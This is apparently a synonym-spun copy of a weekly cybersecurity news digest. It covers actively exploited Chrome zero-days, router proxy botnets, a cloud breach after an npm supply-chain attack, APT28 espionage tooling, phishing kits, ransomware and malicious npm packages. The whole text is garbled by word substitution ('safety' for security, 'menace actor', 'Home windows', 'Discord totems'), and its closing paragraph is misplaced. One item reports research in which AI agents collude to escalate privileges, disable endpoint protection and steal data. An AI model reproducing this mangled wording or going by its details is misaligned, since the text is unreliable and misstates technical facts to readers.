Chrome 0-Days, Router Botnets, AWS Breach, Rogue AI Brokers & Extra

Ravie LakshmananMar 16, 2026Cybersecurity / Hacking

Some weeks in safety really feel regular. You then learn a couple of tabs and get that quick “ah, great, we’re doing this now” feeling.

This week has that power. Recent messes, previous issues getting sharper, and analysis that stops feeling theoretical actual quick. Just a few bits hit a bit of too near actual life, too. There’s combine right here: bizarre abuse of trusted stuff, quiet infrastructure ugliness, sketchy chatter, and the same old reminder that attackers will use something that works.

Scroll on. You’ll see what I imply.

⚡ Risk of the Week

Google Patches 2 Actively Exploited Chrome 0-Days — Google launched safety updates for its Chrome net browser to deal with two high-severity vulnerabilities that it mentioned have been exploited within the wild. The vulnerabilities associated to an out-of-bounds write vulnerability within the Skia 2D graphics library (CVE-2026-3909) and an inappropriate implementation vulnerability within the V8 JavaScript and WebAssembly engine (CVE-2026-3910) that would lead to out-of-bounds reminiscence entry or code execution, respectively. Google didn’t share further particulars concerning the flaws, however acknowledged that there exist exploits for each of them. The problems have been addressed in Chrome variations 146.0.7680.75/76 for Home windows and Apple macOS, and 146.0.7680.75 for Linux. 

🔔 Prime Information

• Meta to Discontinue Instagram E2EE in Might 2026 — Meta introduced plans to discontinue help for end-to-end encryption (E2EE) for chats on Instagram after Might 8, 2026. In an announcement shared with The Hacker Information, a Meta spokesperson mentioned, “Very few people were opting in to end-to-end encrypted messaging in DMs, so we’re removing this option from Instagram in the coming months. Anyone who wants to keep messaging with end-to-end encryption can easily do that on WhatsApp.”
• Authorities Disrupt SocksEscort Service — A court-authorized worldwide regulation enforcement operation dismantled a prison proxy service named SocksEscort that enslaved 1000’s of residential routers worldwide right into a botnet for committing large-scale fraud. “The malware allowed SocksEscort to direct internet traffic through the infected routers. SocksEscort sold this access to its customers,” the U.S. Justice Division mentioned. The principle factor to notice right here is that SocksEscort was powered by AVrecon, a malware written in C to explicitly goal MIPS and ARM architectures by way of recognized safety flaws in edge community gadgets. The malware additionally featured a novel persistence mechanism that concerned flashing customized firmware, which deliberately disables future updates, completely reworking SOHO routers into SocksEscort proxy nodes to blindside company monitoring.
• UNC6426 Exploits nx npm Provide Chain Assault to Achieve AWS Admin Entry in 72 Hours — A menace actor generally known as UNC6426 leveraged keys stolen following the provision chain compromise of the nx npm package deal in August 2025 to utterly breach a sufferer’s AWS surroundings inside 72 hours. UNC6426 used the entry to abuse the GitHub-to-AWS OpenID Join (OIDC) belief and create a brand new administrator function within the cloud surroundings, Google mentioned. Subsequently, this function was abused to exfiltrate recordsdata from the shopper’s Amazon Net Companies (AWS) Easy Storage Service (S3) buckets and carry out knowledge destruction of their manufacturing cloud environments.
• KadNap Enslaves Community Units to Gas Unlawful Proxy — A takedown-resistant botnet comprising greater than 14,000 routers and different community gadgets has been conscripted right into a proxy community that anonymously ferries visitors used for cybercrime. The botnet, named KadNap, exploits recognized vulnerabilities in Asus routers (amongst others), leveraging the preliminary entry to drop shell scripts that attain out to a peer-to-peer community primarily based on Kademlia for decentralized management. Contaminated gadgets are getting used to gasoline a proxy service named Doppelganger that, for a charge, tunnels prospects’ web visitors by way of residential IP addresses, providing a means for attackers to mix in and make it tougher to distinguish malicious visitors from reputable exercise.
• APT28 Strikes with Refined Toolkit — The Russian menace actor generally known as APT28 has been noticed utilizing a bespoke toolkit in latest cyber espionage campaigns concentrating on Ukrainian cyber belongings. The first elements of the toolkit are two implants, one in every of which employs methods from a malware framework the menace actor utilized in 2010s, whereas the opposite is a closely modified model of the COVENANT framework for long-term spying. COVENANT is utilized in live performance with BEARDSHELL to facilitate knowledge exfiltration, lateral motion, and execution of PowerShell instructions. Additionally alongside these instruments is a malware named SLIMAGENT that shares overlaps with XAgent.

‎️‍🔥 Trending CVEs

New vulnerabilities present up each week, and the window between disclosure and exploitation retains getting shorter. The issues under are this week’s most crucial — high-severity, extensively used software program, or already drawing consideration from the safety group.

Examine these first, patch what applies, and do not wait on those marked pressing — CVE-2026-3909, CVE-2026-3910, CVE-2026-3913 (Google Chrome), CVE-2026-21666, CVE-2026-21667, CVE-2026-21668, CVE-2026-21672, CVE-2026-21708, CVE-2026-21669, CVE-2026-21671 (Veeam Backup & Replication), CVE-2026-27577, CVE-2026-27493, CVE-2026-27495, CVE-2026-27497 (n8n), CVE-2026-26127, CVE-2026-21262 (Microsoft Home windows), CVE-2019-17571, CVE-2026-27685 (SAP), CVE-2026-3102 (ExifTool for macOS), CVE-2026-27944 (Nginx UI), CVE-2025-67826 (K7 Final Safety), CVE-2026-26224, CVE-2026-26225 (Intego X9), CVE-2026-29000 (pac4j-jwt), CVE-2026-23813 (HPE Aruba Networking AOS-CX), CVE-2025-12818 (PostgreSQL), CVE-2026-2413 (Ally WordPress plugin), CVE-2026-0953 (Tutor LMS Professional WordPress plugin), CVE-2026-25921 (Gogs), CVE-2026-2833, CVE-2026-2835, CVE-2026-2836 (Cloudflare Pingora), CVE-2026-24308 (Apache ZooKeeper), CVE-2026-3059, CVE-2026-3060, CVE-2026-3989 (SGLang), CVE-2026-0231 (Palo Alto Networks Cortex XDR Dealer VM), CVE-2026-20040, CVE-2026-20046 (Cisco IOS XR Software program), CVE-2025-65587 (graphql-upload-minimal), CVE-2026-3497 (OpenSSH), CVE-2026-26123 (Microsoft Authenticator for Android and iOS), and CVE-2025-61915 (CUPS).

🎥 Cybersecurity Webinars

• Cease Guessing: Automate Your Protection In opposition to Actual-World Assaults → Learn to transfer past fundamental safety checklists by utilizing automation to check your defenses in opposition to real-world assaults. Consultants will present you why conventional testing typically fails and learn how to use steady, data-driven instruments to seek out and repair gaps in your safety. You’ll learn to show your safety truly works with out growing your handbook workload.
• Repair Your Id Safety: Closing the Gaps Earlier than Hackers Discover Them → This webinar covers a brand new research about why many firms are struggling to maintain their consumer accounts and digital identities secure. Consultants share findings from the Ponemon Institute on the largest safety gaps, resembling disconnected apps and the brand new dangers created by AI. You’ll study easy, sensible steps to repair these issues and get higher management over who has entry to your organization’s knowledge.
• The Ghost within the Machine: Securing the Secret Identities of Your AI Brokers → As synthetic intelligence (AI) begins to behave by itself, companies face a brand new problem: learn how to give these “AI agents” the best digital IDs. This webinar explains why present safety for people does not work for autonomous bots and learn how to construct a greater system to trace what they do. You’ll study easy, real-world steps to provide AI brokers safe identities and clear guidelines, guaranteeing they do not by chance expose your non-public firm knowledge.

📰 Across the Cyber World

• Pretend Google Safety Examine Drops Browser RAT — An online web page mimicking a Google Account safety web page has been noticed delivering a totally featured browser-based surveillance toolkit that takes the type of a Progressive Net App (PWA). “Disguised as a routine security checkup, it walks victims through a four-step flow that grants the attacker push notification access, the device’s contact list, real-time GPS location, and clipboard contents—all without installing a traditional app,” Malwarebytes mentioned. “For victims who follow every prompt, the site also delivers an Android companion package introducing a native implant that includes a custom keyboard (enabling keystroke capture), accessibility-based screen reading capabilities, and permissions consistent with call log access and microphone recording.”
• Forbidden Hyena Delivers BlackReaperRAT — A hacktivist group generally known as Forbidden Hyena (aka 4B1D) has distributed RAR archives in December 2025 and January 2026 in assaults concentrating on Russia that led to the deployment of a beforehand undocumented distant entry trojan known as BlackReaperRAT and an up to date model of the Blackout Locker ransomware, known as Milkyway by the menace actors. BlackReaperRAT is able to operating instructions by way of “cmd.exe,” importing/downloading recordsdata, spawning an HTTP shell to obtain instructions, and spreading the malware to related detachable media. “It carries out destructive attacks against organizations across various sectors located within the Russian Federation,” BI.ZONE mentioned. “The group publishes information regarding successful attacks on its Telegram channel. It collaborates with the groups Cobalt Werewolf and Hoody Hyena.”
• Chinese language Hackers Goal the Persian Gulf area with PlugX — A China-nexus menace actor, probably suspected to be Mustang Panda, has focused international locations within the Persian Gulf area. The exercise passed off throughout the first 24 hours of the continued battle within the Center East late final month. The marketing campaign used a multi-stage assault chain that in the end deployed a PlugX backdoor variant. “The shellcode and PlugX backdoor used obfuscation techniques such as control flow flattening (CFF) and mixed boolean arithmetic (MBA) to hinder reverse engineering,” Zscaler mentioned. “The PlugX variant in this campaign supports HTTPS for command-and-control (C2) communication and DNS-over-HTTPS (DOH) for domain resolution.”
• Phishing Marketing campaign Makes use of web optimization Poisoning to Steal Information — A phishing marketing campaign has employed web optimization poisoning to direct search engine outcomes to faux visitors ticket portals that impersonate the Authorities of Canada and particular provincial businesses. “The campaign lures victims to a fake ‘Traffic Ticket Search Portal’ under the pretense of paying outstanding traffic violations,” Palo Alto Networks Unit 42 mentioned. “Submitted data includes license plates, address, date of birth, phone/email, and credit card numbers.” The phishing pages make the most of a “waiting room” tactic the place the sufferer’s browser polls the server each two seconds and triggers redirects primarily based on particular standing codes.
• Roundcube Exploitation Toolkit Found — Hunt.io mentioned it found a Roundcube exploitation toolkit on an internet-exposed listing on 203.161.50[.]145. It is price noting that Russian menace actors like APT28, Winter Vivern, and TAG-70 have repeatedly focused Roundcube vulnerabilities to breach Ukrainian organizations. “The directory included development and production XSS payloads, a Flask-based command-and-control server, CSS-injection tooling, operator bash history, and a Go-based implant deployed on a compromised Ukrainian web application,” the corporate mentioned, attributing it with medium to excessive confidence to APT28, citing overlaps with Operation RoundPress. The toolkit, dubbed Roundish, helps credential harvesting, persistent mail forwarding, bulk electronic mail exfiltration, handle e book theft, and two-factor authentication (2FA) secret extraction, mirroring a function current in MDAEMON. One of many major targets of the assault is mail.dmsu.gov[.]ua, a Roundcube webmail occasion related to Ukraine’s State Migration Service (DMSU). Apart from the potential for a shared improvement lineage, Roundish introduces 4 new elements not beforehand documented in APT28 webmail exercise, together with a CSS-based side-channel module, browser credential stealer, and a Go-based backdoor that gives persistence by way of cron, systemd, and SELinux. The CSS injection element is designed to progressively extract characters from Roundcube’s doc object mannequin (DOM) with out injecting any JavaScript into the sufferer’s web page. The approach is probably going used for concentrating on Cross-Website Request Forgery (CSRF) tokens or electronic mail UIDs. Central to the Roundish toolkit is an XSS payload that is engineered to steal the sufferer’s electronic mail handle, harvest account credentials, redirect all incoming emails to a Proton Mail handle, export mailbox knowledge from the sufferer’s Inbox and Despatched folders, and collect the sufferer’s full handle e book. “The combination of hidden autofill credential harvesting, server-side mail forwarding persistence, bulk mailbox exfiltration, and browser credential theft reflects a modular approach designed for sustained access,” Hunt.io mentioned. “From a defensive perspective, password resets alone are not sufficient in cases like this. Mail forwarding rules, Sieve filters, and multi-factor authentication secrets must be audited and reset.”
• Phishing Marketing campaign Concentrating on AWS Console Credentials — An energetic adversary-in-the-middle (AiTM) phishing marketing campaign is utilizing faux safety alert emails to steal AWS Console credentials, per Datadog. “The phishing kit proxies authentication to the legitimate AWS sign-in endpoint in real time, validating credentials before redirecting victims and likely capturing one-time password (OTP) codes,” the corporate mentioned. “This campaign does not exploit AWS vulnerabilities or abuse AWS infrastructure.” Submit-compromise console entry has been noticed inside 20 minutes of credential submission. These efforts originated from Mullvad VPN infrastructure.
• Malicious npm Packages Ship Cipher stealer — Two new malicious npm packages, bluelite-bot-manager and test-logsmodule-v-zisko, have been discovered to ship by way of Dropbox a Home windows executable designed to siphon delicate knowledge, together with Discord totems, credentials from Chrome, Edge, Opera, Courageous, and Yandex browsers, and seed recordsdata from cryptocurrency pockets apps like Exodus. from compromised hosts utilizing a stealer named Cipher stealer. “The stealer also uses an embedded Python script and a secondary payload downloaded from GitHub,” JFrog mentioned.
• GIBCRYPTO Ransomware Detailed — A brand new ransomware known as GIBCRYPTO comes with the power to seize keystrokes and corrupt the Grasp Boot Report (MBR) in order that any try to restart the system will trigger the system to run into an error. The ransomware makes use of the Salsa20 algorithm for encryption. It is suspected to be a part of Snake Keylogger, indicating the malware authors’ makes an attempt to diversify past data theft. The event comes as Sygnia highlighted SafePay’s OneDrive-based knowledge exfiltration approach throughout a ransomware assault after breaching a sufferer by leveraging a FortiGate firewall flaw and a misconfigured administrative account. “SafePay gained initial access by exploiting a firewall misconfiguration, which enabled them to obtain local administrative credentials,” the corporate mentioned. “They rapidly escalated discovery and enumeration activities to identify high-value targets for lateral movement, demonstrating a structured and methodical approach to mapping the environment. Within a matter of hours, SafePay escalated to domain administrator access.” The assault culminated within the deployment of ransomware, encrypting greater than 60 servers.
• Fraudulent Account Registration Exercise Originating from Vietnam — A sprawling cybercrime ecosystem primarily based in Vietnam has been linked to a cluster of fraudulent account registration exercise on platforms like LinkedIn, Instagram, Fb, and TikTok. In these assaults, attributed to O-UNC-036, the menace actors depend on disposable electronic mail addresses as a way to execute SMS pumping assaults, additionally known as Worldwide Income Sharing Fraud (IRSF). “In this scheme, malicious actors automate the creation of puppet accounts in a targeted service provider,” Okta mentioned. “Fraudsters use these account registrations to trigger SMS messages to premium rate phone numbers and profit from charges incurred. This activity can prove costly for service providers who use SMS to verify registration information in customer accounts or to send multi-factor authentication (MFA) security codes.” O-UNC-036 has additionally been linked to a cybercrime-as–a-service (CaaS) ecosystem that gives paid infrastructure and companies to facilitate on-line fraud. The online-based storefronts are hosted in Vietnam and specialize within the gross sales of web-based accounts.
• Hijacked AppsFlyer SDK Distributes Crypto Clipper — The AppsFlyer Net SDK was briefly hijacked to serve malicious code to steal cryptocurrency in a provide chain assault. The clipper malware payload got here with capabilities to intercept cryptocurrency pockets addresses entered on web sites and substitute them with attacker-controlled addresses to divert funds to the menace actor. “The AppsFlyer Web SDK was observed serving obfuscated malicious JavaScript instead of the legitimate SDK from websdk.appsflyer[.]com,” Profero mentioned. “The malicious payload appears to have been designed for stealth and compatibility, preserving legitimate SDK functionality while adding hidden browser hooks and wallet-hijacking logic.” The incident has since been resolved by AppsFlyer.
• Operation CamelClone Targets Authorities and Protection Entities — A brand new cyber espionage marketing campaign dubbed Operation CamelClone has focused governments and protection entities in Algeria, Mongolia, Ukraine, and Kuwait utilizing malicious ZIP archives that comprise a Home windows shortcut (LNK) file, which, when executed, delivers a JavaScript loader named HOPPINGANT. The loader then delivers further payloads for establishing C2 and exfiltrating knowledge to the MEGA cloud storage service. “One interesting aspect of this campaign is that the threat actor does not rely on traditional command-and-control infrastructure,” Seqrite Labs mentioned. “Instead, the payloads are hosted on a public file-sharing service, filebulldogs[.]com, while stolen data is uploaded to MEGA storage using the legitimate tool Rclone.” The exercise has not been attributed to any recognized menace group.
• How Risk Actors Exfiltrate Credentials Utilizing Telegram Bots — Risk actors are abusing the Telegram Bot API to exfiltrate knowledge by way of textual content messages or arbitrary file uploads, highlighting how reputable companies will be weaponized to evade detection. Agent Tesla Keylogger is by far probably the most distinguished instance of a malware household that makes use of Telegram for C2. “In general, Telegram C2s appear to be most popular among information stealers, possibly due to Telegram’s technically legitimate nature and because information stealers typically only need to exfiltrate data passively rather than provide complex communications beyond simple message or file transfers,” Cofense mentioned.
• Microsoft Launches Copilot Well being — Microsoft has turn out to be the most recent firm after OpenAI and Anthropic to launch a devoted “secure space” known as Copilot Well being that integrates medical data, biometric knowledge from wearables, and lab take a look at outcomes to provide customized recommendation within the U.S. “Copilot Health brings together your health records, wearable data, and health history into one place, then applies intelligence to turn them into a coherent story,” the corporate mentioned. Like OpenAI and Anthropic, Microsoft emphasised that Copilot Well being is not meant to interchange skilled medical care.
• Rogue AI Brokers Can Work Collectively to Have interaction in Offensive Behaviors — In response to a brand new report from synthetic intelligence (AI) safety firm Irregular, brokers can work collectively to hack into programs, escalate privileges, disable endpoint safety, and steal delicate knowledge whereas evading pattern-matching defenses. What’s notable is that the experiment didn’t depend on adversarial prompting or intentionally unsafe system design. “In one case, an agent convinced another agent to carry out an offensive action, a form of inter-agent collusion that emerged with no external manipulation,” Irregular mentioned. “This scenario demonstrates two compounding risks: inter-agent persuasion can erode safety boundaries, and agents can independently develop techniques to circumvent security controls. When an agent is given access to tools or data, particularly but not exclusively shell or code access, the threat model should assume that the agent will use them, and that it will do so in unexpected and possibly malicious ways.”

🔧 Cybersecurity Instruments

• Dev Machine Guard → It’s a free, open-source instrument that scans your laptop to point out you precisely what developer instruments and scripts are operating. It creates a easy listing of your AI coding assistants, code editor extensions, and software program packages that will help you discover something suspicious or outdated. It’s a single script that works in seconds to provide you higher visibility into the safety of your native coding surroundings.
• Trajan → It’s an automatic safety instrument designed to seek out hidden vulnerabilities in “service meshes,” that are the programs that handle how completely different components of a big software program utility speak to one another. As a result of these programs are advanced, it’s straightforward for engineers to make small errors within the settings that permit hackers to bypass safety or steal knowledge. Trajan works by scanning these configurations to identify these particular errors and serving to builders repair them earlier than they are often exploited.

Disclaimer: For analysis and academic use solely. Not security-audited. Evaluate all code earlier than use, take a look at in remoted environments, and guarantee compliance with relevant legal guidelines.

Conclusion

There’s lots packed in right here, and never in a neat means. A few of it’s the traditional recycled chaos, a few of it feels a bit of extra deliberate, and a few of it has that nasty “this is going to show up everywhere by next week” power.

Anyway — sufficient throat-clearing. Right here’s the stuff price your consideration.